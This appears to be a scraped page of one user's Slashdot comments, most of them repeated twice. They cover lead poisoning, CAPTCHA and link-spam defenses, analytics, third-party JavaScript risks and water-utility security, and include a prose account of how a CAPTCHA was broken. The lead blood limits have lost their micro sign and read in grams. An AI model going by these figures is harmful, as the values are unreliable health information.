Actually, lead is quite easily ingested from those sources. Handle a few old tire weights or fishing sinkers that are tarnished, especially if they've been kept in a container where they can rub against each other, and notice how your hands quickly turn gray from the dust. If you then handle a cigarette without washing up, it's all going straight into your bloodstream. If you handle food, some of the lead will be excreted, but about a third will remain in your body.
While no level of exposure to lead is "safe", NIOSH has a limit of 10 g/dL for regular people, 5 g/dL for children, and 30 g/dL for workers occupationally exposed to lead. In adults, symptoms of blood poisoning become evident at 40 g/dL.
40 g/dL is not a lot. The average adult has 50 dL of blood, meaning 2,000 g (two milligrams) is all it takes to reach the limit. According to wolfram alpha, that amount is the size of about three grains of sand.
According to Wikipedia, blood poisoning has been measured at levels of "109–139 g/dL in indoor shooting range instructors". I find it a bit ironic that the NRA doesn't even mention lead poisoning their own membership. Or maybe that explains a lot about the NRA.
Thanks, Schoolhouse Rock!:-) Actually, I intentionally used the semicolon when a colon or dash would have been more appropriate, but I was trying to play on the original post.
The original "Bullshit, steel and bismuth work fine." could have been written as "Bullshit; steel and bismuth work fine."; "Bullshit! Steel and bismuth work fine."; or even "Bullshit -- steel and bismuth work fine." A comma simply isn't strong enough to separate the interjection when it precedes a list.
Have you ever made an alloy of bullshit, steel, and bismuth? The bullshit adds too much carbon, making it brittle. It's completely unsuitable for bullets.
There's a reason lead acetate is called "sugar of lead" -- it's sweet! The Romans used to boil grape juice in lead pots to make it, and used it when they couldn't get (or afford) honey. But do we know if the Romans who were affected by the toxicity of lead were ingesting it from the incidental plumbing and other uses, or was it primarily from deliberate ingestion?
Not that I'm agreeing with the NRA that we could tolerate more lead in our environment. I'm just wondering how badly it affected the Romans who didn't eat the stuff deliberately.
How are these easy to create? To create these questions a program would need to start out with an answer. In this case white. It would then need to randomly generate a unique question that has never been asked before whose answer is white. This question would need to be easy for humans to solve. But it would need to be impossible to solve by the program that just generated the question. Ohh and you need to generate millions of these question answer pairs everyday. It also needs to be done quickly. People don't want to wait longer than a second for the CAPTCHA to load.
You're trying to solve the problem once and forever. That encourages the spammers to solve the generic problem. But spammers are lazy, and they will solve only the problem presented. Instead of creating millions of questions, create only ten or a hundred questions. Deploy that until the spammers adapt their robots. Then replace those with ten new questions with a different set. Change the format slightly with the new questions. Force the spammers to chase you. That increases their costs dramatically, but makes your problem as simple as updating ten trivia questions per day.
If the spammers switch to Mechanical Turk, you lose no matter what - you can't block humans with spam intent with a human detector.
That suggests a new approach: instead of a "human detector", we really want a "topic detector." We desire people who are going to post on topic, so make them write an on-topic essay in their sign-up request (or first post from a new account.) Slightly tougher to automate than a CAPTCHA, but it would stop even Mechanical Turks if their goal was volume CAPTCHA busting.
It's quite likely that some forums may prefer only letting in people capable of understanding logic, and there aren't any laws against discriminating against those people.
Next up: Jim Crow-bot laws. "You must make your content accessible to all people, regardless of IQ."
Don't try to beat them all in advance. Spammers have shown they will adapt.
Instead, the key is to update CAPTCHAs only in response to an automated spammer breaking through. Offer ten rotating questions today. If the robots get through, offer ten different rotating questions tomorrow. Make it expensive for the spammers to continually update their robots, and make it cheap for you to update your questions. Beat the spammers on cost.
That implies that spammers are unconcerned whether or not their spam is effective. They're concerned about the ease of spamming.
Which makes perfect sense if you're farming out the task of spamming to cheap labor or to robots - the laborers will follow your instructions, it's not their job to analyze whether or not it's working. So you could warn the users all you want that their spamming will not be effective, but the spammers are not even going to read it, and will pollute your site anyway.
That further implies that even a weak captcha would be enough to stop robots and low-paid laborers. And a friend of mine offers anecdotal evidence that it helps. He added a check box to his site: "check here if you are not a spammer [ ]". It reduced some of the automated spam. But he still reads and approves all comments before they're posted, as there is still spam.
What about a script that produced randomized simplistic captchas: "Human test: two plus three equals [ ] four [ ] five [ ] six" "Please answer this question - three added to three is [ ] six [ ] seven [ ] eight". Vary the wording, vary the answers, vary the correct answer position, vary the position of the question on your sign up screen, and randomize the field name. It will stop robots until someone specifically targets your site.
Better, don't vary anything until you need to. Let the spammers do the work first of adapting to you. They might ignore your site unless you're really worth it to them as a target. Then vary one thing, and see if they "chase" you with a round of fixes. If they continually adapt their robots, (or pay for smarter laborers), then you need to do something else. If not, you've saved yourself a lot of work, and you still have fewer spammers.
There's an obvious measure: don't allow untrusted users to provide links at all, and sanitize their data (server side) to mangle any protocol headers from their text, like adding a space before any text matching://, so the results become http:// , https://, or mailto://. No search engine will try to follow those. You are already santitizing your inputs to restrict users from posting bad stuff like javascript, right? This is just one more thing to check.
You could even get cute using javascript in the browser to flag the text in red if they try to type a URL so they might know in advance they will get nowhere.
Then, to reward the faithful, you can have a karma system that permits voted-up users to post valid links (like stackoverflow). Or you can have an admin manually grant them "good user standing". Either way, your spammer is either contributing real value to your site (which is great) or they've gone away (which is great.)
Adding rel="nofollow" to any links provided by your untrusted commenters is a good start. It's a promise that Google and other search engines won't do any indexing or page ranking based on the href in the same tag.
Spammers have a pretty common M.O. They sign up with an account and use their spam link as their "home page". They then pollute the blog. The obvious spam is repeated variations on the same topic, and looks like "brand name products, products brand name, brand products name,..."
Lately, link spam is done with a flattering but generic message that looks like it came from a non-native speaker: "I thanking you for your keen insight, have you other similar articles online? I would like to know more how you come to know this." An unwary site operator will often mistake the flattery for a conversation, and allow the spammer to remain a user. (The flattery is script-generated, by the way.) Their "home page" is often a dummy "news portal", which is just replaying whatever feeds they can get. The trick is this news portal has lots of links to the sites the SEO is trying to push.
While rel="nofollow" will render their efforts to associate their spam with a legitimate blog completely wasted, there are two negatives. First, unless the spammer knows it's there, they're going to spam you anyway. Second, it takes away your contribution of "linkiness" for your legitimate users' links to Google's pagerank algorithm. You can fix this with extra work like "probationary" and "full" users, but then you're taking on the task of rating your readers, which may be Sisyphean on a site the size of Slashdot.
Essentially, the guy realized that jpeg pictures with distortions should have a completely different size than the undistorted picture. But all pictures delivered by minteye were of identical length. He figured they were padding the files with zeros, and he was right. By counting the number of zeros at the end of the file, the local maxima/minima was the correct file. He wrote a few lines of javascript, and it was broke.
It was confusingly worded in TFA. What I eventually figured from it is that it was not used as a discovery mechanism. It looks like it was a test they performed after it was revealed, and the test only confirmed that she was the author.
It was not done to uncover any hidden truths, it was done to demonstrate the correctness of the tool.
Cardinal Richelieu (supposedly) wrote: "If you give me six lines written by the hand of the most honest of men, I will find something in them which will hang him." Will the JStylo-Anonymouth mean that he'd be able to hang everyone who used it?
Like you, I'm running Adblock Plus, Ghostery, and NoScript, and I'm manually whitelisting them in NoScript. It's definitely not a process that is ready for the general public. And like you I find that some sites are indeed difficult to unwind to discover what should really be enabled to restore functionality, and what is not valuable to me.
When I need something from a site, I usually walk the list of NoScript "forbids", enabling them one at a time until it works. I start with any that might appear to be an obvious CDN. I then enable the others, ignoring the known analytics providers until last. Sometimes I have to permit them in Ghostery, too.
Fortunately, the number of sites with their own complex CDN is low. For the shared CDN providers, once you've solved the disqus puzzle on one site, the cure fixes all other sites that use it. So it's not a big deal either. I think I have about a hundred CDNs in my whitelist now, and encountering and unwinding a new one is not even a weekly occurrence any more.
Thanks! I was looking at a Wacom digitizer earlier this year, but the price was a showstopper. The kind with the built in display (which is what would help the most for the kind of work I'm trying to do) were > $1K. If I can get one that not only does digitizing but can be my tablet, that's sounding like a bargain.
I think I'll get one and play with it before I commit to selling the iPad, though.
Analytics allow site owners to see interesting data about their pages - how many visits, etc. The owners can theoretically improve their pages so I get a better experience. And it's free! Who doesn't love a free service?
But the well-known rule is that if someone's giving you something for free, you are the product, not the consumer. So they're selling you out the back end. Think about what they now have to sell.
The answer is that the analytics providers are tracking behavior from search to sale. They are able to tell their paying customers "people who search for 'XYZZY' are buying magic wands for an average of 30 gold pieces each. The higher they are on the search results, the closer they are to the average price. There are 10,000 queries for XYZZY from the US each day, and 500 of those result in sales. If you pay for an XYZZY adword, you'll see about 2,500 of those people. Half the people who searched for XYZZY went to MagicWandRatings.com before buying magic wands, and of those their readers chose PLUGH brand magic rods over XYZZY magic wands 10 to 1. Cart abandonment of 40 G.P. magic wands is at 80%, while card abandonment of 38 G.P. magic wands is at 70%."
The first thing my SEO guy is going to do is head to MagicWandRatings.com and create a couple dozen sock puppets to tout XYZZY wands. He's going to lie his butt off telling people that XYZZY wands are the fierce green snake's pyjamas. MagicWandRatings.com, once the most trusted site in magic wand ratings, is going to become an unreliable source of information regarding wands thanks to this pollution, yet the search engines are going to continue to lead me there anyway.
Analytics lets the sellers discover the highest going prices to sell their merchandise at. This results in the highest possible prices for me, the consumer. So I get a high-priced crappy wand as a result of analytics.
As a consumer, analytics ultimately do not benefit me. They corrupt the web and cost me money and quality. Thanks, but I'll opt out.
If anyone else used exploits to screw with people, it would be called hacking and they'd probably go to prison, but when the FBI does it, it's 'okay.'
Actually, a judge has yet to find whether it's OK or not. The admissibility of the evidence in these cases is going to hinge on whether or not it was collected through legal means. And no matter which way the judge finds, the loser is going to appeal. As far as I know, this is all untested legal ground.
That considers only the performance viewpoint. As a web developer, it's valuable to him because A) he's not responsible for hosting the latest version himself, B) he's not paying to deliver it to his viewers, and C) his users can use their already cached version of the script they got visiting a different site.
Security wise, it's risky. If someone's encountered malware that's stored a poisoned version of jquery in their web-cache, and they go to your site, they're already pwned - and now they're on your site with your data!! Even more hilarious, when the bad guys deliver their malware script, they deliver it with a Cache-Control: max-age=86400*30, which means it will live for a month in the victim's cache.
If you want to host jquery on your own CDN, you're dealing with a "known-good" (or at least "known-clean") copy of the code. If you're trusting the user's browser to pull whatever copy they have out of their cache, you're begging to be a target.
The only "great content" javascript offers is ads and intern-generated page bloat.
JavaScript is not great content. JavaScript enables greatly increased usability of content.
Website owners can and should use the tools at their disposal to present and manipulate content in a way that makes it interesting, fun, informative, and usable. But that shouldn't extend beyond their data. They should also accept responsibility for the safe presentation of other content, like ads. And dynamic execution and safety are at opposite ends of the spectrum.
Random delays only delay an attacker, they may not prevent it.
Let's say you had a reply that took 25 milliseconds if it was cached, and 75 milliseconds if it wasn't. To fix it, you add a delay from 0-100 milliseconds to a reply. The attacker would just have to repeat his attack about six times to see the average response time. He'd figure it out soon enough.
Javascript is cool for offering great content. But why would anyone allow JavaScript from non-primary-domain sources? Advertisers may want their readers to have an "rich, interactive, dynamic experience". Fine, they can offer that: on their site, after the users click over to your site from a static image.
The rest of the linked-in javascript out there is mostly analytics, which do not benefit you as a user.
And as a web site operator, you can be pretty sure that customers don't want to be pwned just because of a javascript brought in by your site. Should you really be linking to others that offer it?
The GP said "he's whitelisting everything." He's doing it wrong - allow the javascript from servers in the *.domain.com for any given page, then selectively enable it from sites that add on features you care about, like disqus and vimeo. It's not a long list, and once you've whitelisted vimeo and vimeocdn for one site, you're not constantly enabling them on others.
I've never heard of anyone using city water for large scale crop irrigation. A greenhouse or two might use city water, but not a field of corn. Farmers will dip a pipe into a creek, river, pond, or lake, and pump the water to the fields. They will drill into the aquifer. They will hire trucks to haul in water. But they will not pay the city to pump the water. And the city probably wouldn't let them even if they wanted to, because they use so much water they'd drain their towers, leaving them nothing to fight fires.
Just damaging a few pumps and valves would shut down a city. Last year Minneapolis had a 20 block area shut down for a day due to a single burst water main, leaving many downtown buildings without potable water. Businesses sent the employees home because they couldn't provide sanitary facilities. Restaurants couldn't cook. The physical damage was minor flooding of a street and a construction site, but the financial damage was large.
So you would have the city leasing expensive lines between plants? I've not met too many people who complained their taxes and water rates were too low, and that they wanted the same service with more security and were willing to pay extra for it. I do, however, see a constant parade of talking heads on TV who bitch incessantly about how high taxes are, how they'll cut taxes when they get in office, or that government budgets should be cut by 10%. Well, their budgets were cut and so the cities cut their corners, and saved whatever money they could, and now their water system is in the hands of hackers. They got exactly what the taxpayers told them they were willing to pay for. We have the exact systems we deserve.
Could they and should they beef up their security? Of course. But does each water system owner even know if they have a problem? These guys are civil engineers in sleepy little towns, not security wonks. They probably didn't install the ICS themselves, they probably contracted all that out, and among the site survey forms they filled out was "choose your system password (minimum 6 characters)" and trusted the vendor to provide the rest of the security (back in 1993 when they installed it.) They might not even know they can change it, or how to change it. or that they need to do something different. Even if they did, the first rule of ICS configuration is "DON'T TOUCH IT!" So don't expect them to get all excited about the chance to make a change.
They would likely learn a lot more about these problems at their state's annual public works conference, if their city can afford to send them this year, and if their state can afford to hold one.
Slashdot Mirror
Whoosh.
Actually, lead is quite easily ingested from those sources. Handle a few old tire weights or fishing sinkers that are tarnished, especially if they've been kept in a container where they can rub against each other, and notice how your hands quickly turn gray from the dust. If you then handle a cigarette without washing up, it's all going straight into your bloodstream. If you handle food, some of the lead will be excreted, but about a third will remain in your body.
While no level of exposure to lead is "safe", NIOSH has a limit of 10 g/dL for regular people, 5 g/dL for children, and 30 g/dL for workers occupationally exposed to lead. In adults, symptoms of blood poisoning become evident at 40 g/dL.
40 g/dL is not a lot. The average adult has 50 dL of blood, meaning 2,000 g (two milligrams) is all it takes to reach the limit. According to wolfram alpha, that amount is the size of about three grains of sand.
According to Wikipedia, blood poisoning has been measured at levels of "109–139 g/dL in indoor shooting range instructors". I find it a bit ironic that the NRA doesn't even mention lead poisoning their own membership. Or maybe that explains a lot about the NRA.
Thanks, Schoolhouse Rock! :-) Actually, I intentionally used the semicolon when a colon or dash would have been more appropriate, but I was trying to play on the original post.
The original "Bullshit, steel and bismuth work fine." could have been written as "Bullshit; steel and bismuth work fine."; "Bullshit! Steel and bismuth work fine."; or even "Bullshit -- steel and bismuth work fine." A comma simply isn't strong enough to separate the interjection when it precedes a list.
Have you ever made an alloy of bullshit, steel, and bismuth? The bullshit adds too much carbon, making it brittle. It's completely unsuitable for bullets.
Semicolons; use them.
There's a reason lead acetate is called "sugar of lead" -- it's sweet! The Romans used to boil grape juice in lead pots to make it, and used it when they couldn't get (or afford) honey. But do we know if the Romans who were affected by the toxicity of lead were ingesting it from the incidental plumbing and other uses, or was it primarily from deliberate ingestion?
Not that I'm agreeing with the NRA that we could tolerate more lead in our environment. I'm just wondering how badly it affected the Romans who didn't eat the stuff deliberately.
How are these easy to create? To create these questions a program would need to start out with an answer. In this case white.
It would then need to randomly generate a unique question that has never been asked before whose answer is white.
This question would need to be easy for humans to solve. But it would need to be impossible to solve by the program that just generated the question.
Ohh and you need to generate millions of these question answer pairs everyday. It also needs to be done quickly. People don't want to wait longer than a second for the CAPTCHA to load.
You're trying to solve the problem once and forever. That encourages the spammers to solve the generic problem. But spammers are lazy, and they will solve only the problem presented. Instead of creating millions of questions, create only ten or a hundred questions. Deploy that until the spammers adapt their robots. Then replace those with ten new questions with a different set. Change the format slightly with the new questions. Force the spammers to chase you. That increases their costs dramatically, but makes your problem as simple as updating ten trivia questions per day.
If the spammers switch to Mechanical Turk, you lose no matter what - you can't block humans with spam intent with a human detector.
That suggests a new approach: instead of a "human detector", we really want a "topic detector." We desire people who are going to post on topic, so make them write an on-topic essay in their sign-up request (or first post from a new account.) Slightly tougher to automate than a CAPTCHA, but it would stop even Mechanical Turks if their goal was volume CAPTCHA busting.
It's quite likely that some forums may prefer only letting in people capable of understanding logic, and there aren't any laws against discriminating against those people.
Next up: Jim Crow-bot laws. "You must make your content accessible to all people, regardless of IQ."
Don't try to beat them all in advance. Spammers have shown they will adapt.
Instead, the key is to update CAPTCHAs only in response to an automated spammer breaking through. Offer ten rotating questions today. If the robots get through, offer ten different rotating questions tomorrow. Make it expensive for the spammers to continually update their robots, and make it cheap for you to update your questions. Beat the spammers on cost.
That implies that spammers are unconcerned whether or not their spam is effective. They're concerned about the ease of spamming.
Which makes perfect sense if you're farming out the task of spamming to cheap labor or to robots - the laborers will follow your instructions, it's not their job to analyze whether or not it's working. So you could warn the users all you want that their spamming will not be effective, but the spammers are not even going to read it, and will pollute your site anyway.
That further implies that even a weak captcha would be enough to stop robots and low-paid laborers. And a friend of mine offers anecdotal evidence that it helps. He added a check box to his site: "check here if you are not a spammer [ ]". It reduced some of the automated spam. But he still reads and approves all comments before they're posted, as there is still spam.
What about a script that produced randomized simplistic captchas: "Human test: two plus three equals [ ] four [ ] five [ ] six" "Please answer this question - three added to three is [ ] six [ ] seven [ ] eight". Vary the wording, vary the answers, vary the correct answer position, vary the position of the question on your sign up screen, and randomize the field name. It will stop robots until someone specifically targets your site.
Better, don't vary anything until you need to. Let the spammers do the work first of adapting to you. They might ignore your site unless you're really worth it to them as a target. Then vary one thing, and see if they "chase" you with a round of fixes. If they continually adapt their robots, (or pay for smarter laborers), then you need to do something else. If not, you've saved yourself a lot of work, and you still have fewer spammers.
There's an obvious measure: don't allow untrusted users to provide links at all, and sanitize their data (server side) to mangle any protocol headers from their text, like adding a space before any text matching ://, so the results become http :// , https ://, or mailto ://. No search engine will try to follow those. You are already santitizing your inputs to restrict users from posting bad stuff like javascript, right? This is just one more thing to check.
You could even get cute using javascript in the browser to flag the text in red if they try to type a URL so they might know in advance they will get nowhere.
Then, to reward the faithful, you can have a karma system that permits voted-up users to post valid links (like stackoverflow). Or you can have an admin manually grant them "good user standing". Either way, your spammer is either contributing real value to your site (which is great) or they've gone away (which is great.)
Adding rel="nofollow" to any links provided by your untrusted commenters is a good start. It's a promise that Google and other search engines won't do any indexing or page ranking based on the href in the same tag.
Spammers have a pretty common M.O. They sign up with an account and use their spam link as their "home page". They then pollute the blog. The obvious spam is repeated variations on the same topic, and looks like "brand name products, products brand name, brand products name, ..."
Lately, link spam is done with a flattering but generic message that looks like it came from a non-native speaker: "I thanking you for your keen insight, have you other similar articles online? I would like to know more how you come to know this." An unwary site operator will often mistake the flattery for a conversation, and allow the spammer to remain a user. (The flattery is script-generated, by the way.) Their "home page" is often a dummy "news portal", which is just replaying whatever feeds they can get. The trick is this news portal has lots of links to the sites the SEO is trying to push.
While rel="nofollow" will render their efforts to associate their spam with a legitimate blog completely wasted, there are two negatives. First, unless the spammer knows it's there, they're going to spam you anyway. Second, it takes away your contribution of "linkiness" for your legitimate users' links to Google's pagerank algorithm. You can fix this with extra work like "probationary" and "full" users, but then you're taking on the task of rating your readers, which may be Sisyphean on a site the size of Slashdot.
Minteye was very thoroughly broken.
http://translate.google.com/translate?sl=ru&tl=en&js=n&prev=_t&hl=en&ie=UTF-8&eotf=1&u=http%3A%2F%2Fhabrahabr.ru%2Fpost%2F167359%2F&act=url
Essentially, the guy realized that jpeg pictures with distortions should have a completely different size than the undistorted picture. But all pictures delivered by minteye were of identical length. He figured they were padding the files with zeros, and he was right. By counting the number of zeros at the end of the file, the local maxima/minima was the correct file. He wrote a few lines of javascript, and it was broke.
It was confusingly worded in TFA. What I eventually figured from it is that it was not used as a discovery mechanism. It looks like it was a test they performed after it was revealed, and the test only confirmed that she was the author.
It was not done to uncover any hidden truths, it was done to demonstrate the correctness of the tool.
Cardinal Richelieu (supposedly) wrote: "If you give me six lines written by the hand of the most honest of men, I will find something in them which will hang him." Will the JStylo-Anonymouth mean that he'd be able to hang everyone who used it?
Like you, I'm running Adblock Plus, Ghostery, and NoScript, and I'm manually whitelisting them in NoScript. It's definitely not a process that is ready for the general public. And like you I find that some sites are indeed difficult to unwind to discover what should really be enabled to restore functionality, and what is not valuable to me.
When I need something from a site, I usually walk the list of NoScript "forbids", enabling them one at a time until it works. I start with any that might appear to be an obvious CDN. I then enable the others, ignoring the known analytics providers until last. Sometimes I have to permit them in Ghostery, too.
Fortunately, the number of sites with their own complex CDN is low. For the shared CDN providers, once you've solved the disqus puzzle on one site, the cure fixes all other sites that use it. So it's not a big deal either. I think I have about a hundred CDNs in my whitelist now, and encountering and unwinding a new one is not even a weekly occurrence any more.
Thanks! I was looking at a Wacom digitizer earlier this year, but the price was a showstopper. The kind with the built in display (which is what would help the most for the kind of work I'm trying to do) were > $1K. If I can get one that not only does digitizing but can be my tablet, that's sounding like a bargain.
I think I'll get one and play with it before I commit to selling the iPad, though.
Analytics allow site owners to see interesting data about their pages - how many visits, etc. The owners can theoretically improve their pages so I get a better experience. And it's free! Who doesn't love a free service?
But the well-known rule is that if someone's giving you something for free, you are the product, not the consumer. So they're selling you out the back end. Think about what they now have to sell.
The answer is that the analytics providers are tracking behavior from search to sale. They are able to tell their paying customers "people who search for 'XYZZY' are buying magic wands for an average of 30 gold pieces each. The higher they are on the search results, the closer they are to the average price. There are 10,000 queries for XYZZY from the US each day, and 500 of those result in sales. If you pay for an XYZZY adword, you'll see about 2,500 of those people. Half the people who searched for XYZZY went to MagicWandRatings.com before buying magic wands, and of those their readers chose PLUGH brand magic rods over XYZZY magic wands 10 to 1. Cart abandonment of 40 G.P. magic wands is at 80%, while card abandonment of 38 G.P. magic wands is at 70%."
The first thing my SEO guy is going to do is head to MagicWandRatings.com and create a couple dozen sock puppets to tout XYZZY wands. He's going to lie his butt off telling people that XYZZY wands are the fierce green snake's pyjamas. MagicWandRatings.com, once the most trusted site in magic wand ratings, is going to become an unreliable source of information regarding wands thanks to this pollution, yet the search engines are going to continue to lead me there anyway.
Analytics lets the sellers discover the highest going prices to sell their merchandise at. This results in the highest possible prices for me, the consumer. So I get a high-priced crappy wand as a result of analytics.
As a consumer, analytics ultimately do not benefit me. They corrupt the web and cost me money and quality. Thanks, but I'll opt out.
If anyone else used exploits to screw with people, it would be called hacking and they'd probably go to prison, but when the FBI does it, it's 'okay.'
Actually, a judge has yet to find whether it's OK or not. The admissibility of the evidence in these cases is going to hinge on whether or not it was collected through legal means. And no matter which way the judge finds, the loser is going to appeal. As far as I know, this is all untested legal ground.
That considers only the performance viewpoint. As a web developer, it's valuable to him because A) he's not responsible for hosting the latest version himself, B) he's not paying to deliver it to his viewers, and C) his users can use their already cached version of the script they got visiting a different site.
Security wise, it's risky. If someone's encountered malware that's stored a poisoned version of jquery in their web-cache, and they go to your site, they're already pwned - and now they're on your site with your data!! Even more hilarious, when the bad guys deliver their malware script, they deliver it with a Cache-Control: max-age=86400*30, which means it will live for a month in the victim's cache.
If you want to host jquery on your own CDN, you're dealing with a "known-good" (or at least "known-clean") copy of the code. If you're trusting the user's browser to pull whatever copy they have out of their cache, you're begging to be a target.
The only "great content" javascript offers is ads and intern-generated page bloat.
JavaScript is not great content. JavaScript enables greatly increased usability of content.
Website owners can and should use the tools at their disposal to present and manipulate content in a way that makes it interesting, fun, informative, and usable. But that shouldn't extend beyond their data. They should also accept responsibility for the safe presentation of other content, like ads. And dynamic execution and safety are at opposite ends of the spectrum.
Random delays only delay an attacker, they may not prevent it.
Let's say you had a reply that took 25 milliseconds if it was cached, and 75 milliseconds if it wasn't. To fix it, you add a delay from 0-100 milliseconds to a reply. The attacker would just have to repeat his attack about six times to see the average response time. He'd figure it out soon enough.
Javascript is cool for offering great content. But why would anyone allow JavaScript from non-primary-domain sources? Advertisers may want their readers to have an "rich, interactive, dynamic experience". Fine, they can offer that: on their site, after the users click over to your site from a static image.
The rest of the linked-in javascript out there is mostly analytics, which do not benefit you as a user.
And as a web site operator, you can be pretty sure that customers don't want to be pwned just because of a javascript brought in by your site. Should you really be linking to others that offer it?
The GP said "he's whitelisting everything." He's doing it wrong - allow the javascript from servers in the *.domain.com for any given page, then selectively enable it from sites that add on features you care about, like disqus and vimeo. It's not a long list, and once you've whitelisted vimeo and vimeocdn for one site, you're not constantly enabling them on others.
I've never heard of anyone using city water for large scale crop irrigation. A greenhouse or two might use city water, but not a field of corn. Farmers will dip a pipe into a creek, river, pond, or lake, and pump the water to the fields. They will drill into the aquifer. They will hire trucks to haul in water. But they will not pay the city to pump the water. And the city probably wouldn't let them even if they wanted to, because they use so much water they'd drain their towers, leaving them nothing to fight fires.
Just damaging a few pumps and valves would shut down a city. Last year Minneapolis had a 20 block area shut down for a day due to a single burst water main, leaving many downtown buildings without potable water. Businesses sent the employees home because they couldn't provide sanitary facilities. Restaurants couldn't cook. The physical damage was minor flooding of a street and a construction site, but the financial damage was large.
H@xx0n> Hey, look, I've hacked into the City of Endersgame! Watch me pwn their electric generator!
H@xx0n has left the channel.
So you would have the city leasing expensive lines between plants? I've not met too many people who complained their taxes and water rates were too low, and that they wanted the same service with more security and were willing to pay extra for it. I do, however, see a constant parade of talking heads on TV who bitch incessantly about how high taxes are, how they'll cut taxes when they get in office, or that government budgets should be cut by 10%. Well, their budgets were cut and so the cities cut their corners, and saved whatever money they could, and now their water system is in the hands of hackers. They got exactly what the taxpayers told them they were willing to pay for. We have the exact systems we deserve.
Could they and should they beef up their security? Of course. But does each water system owner even know if they have a problem? These guys are civil engineers in sleepy little towns, not security wonks. They probably didn't install the ICS themselves, they probably contracted all that out, and among the site survey forms they filled out was "choose your system password (minimum 6 characters)" and trusted the vendor to provide the rest of the security (back in 1993 when they installed it.) They might not even know they can change it, or how to change it. or that they need to do something different. Even if they did, the first rule of ICS configuration is "DON'T TOUCH IT!" So don't expect them to get all excited about the chance to make a change.
They would likely learn a lot more about these problems at their state's annual public works conference, if their city can afford to send them this year, and if their state can afford to hold one.